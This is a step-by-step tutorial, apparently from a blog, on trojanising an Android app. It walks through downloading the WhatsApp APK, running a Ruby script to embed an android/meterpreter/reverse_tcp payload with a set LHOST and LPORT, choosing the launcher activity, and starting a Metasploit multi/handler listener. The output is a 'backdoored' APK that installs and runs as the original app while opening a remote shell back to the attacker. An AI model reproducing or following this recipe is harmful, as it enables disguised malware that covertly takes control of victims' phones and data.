To install the required libraries, enter this command at the console:
apt-get install lib32stdc++6 lib32ncurses5 lib32z1
And to get the latest version of ApkTool, head over to this site and follow the installation instructions: Link
First of all grab the original apk from any of the numerous websites available. Just do a google search “app_name apk download” and Google will come up with a lot of results. Save that apk in any folder, in this tutorial I will use the Root folder and a WhatApp.apk as example._
Download the Ruby script from this link and save it in the same folder as that of the original apk : Link
Open a terminal, and type the following command:
ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895
In this example I’ve used 192.168.0.104 as the Local IP address, i.e. your IP address and 4895 as the port on your Computer through which the Meterpreter payload will connect back to you. Make sure to change it to the appropriate values, especially the IP, the LPORT can be set to any reasonable port no.
Once you run the command, if you are lucky, the script will do everything by itself and complete the whole process. But more than often it cannot determine to which Activity of the App it should bind the Payload to, so it asks you to select it. In that case, leave the terminal with the script at the prompt, and browse to /root/original.
Then open the AndroidManifest.xml file using any text editor of your liking and look for an <activity> tag which contains both the texts ‘.MAIN’ and ‘.LAUNCHER’. When you find that tag, look for the ‘android:name’ attribute of that tag and note the name of that Activity.
At the prompt of the Ruby script, enter the number corresponding to the Activity name you had noted previously and press Enter.
This is the hardest step of all, so I’m posting some screenshots also to make your life easier.
If you did everything correctly, you should now get a apk file in your root directory with the name ‘backdoored_WhatsApp.apk’. It will install and run as the original App.
As for the listener, you should use exploit/multi/handler and set the corresponding options accordingly. Just run the following commands.
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.104
set LPORT 4895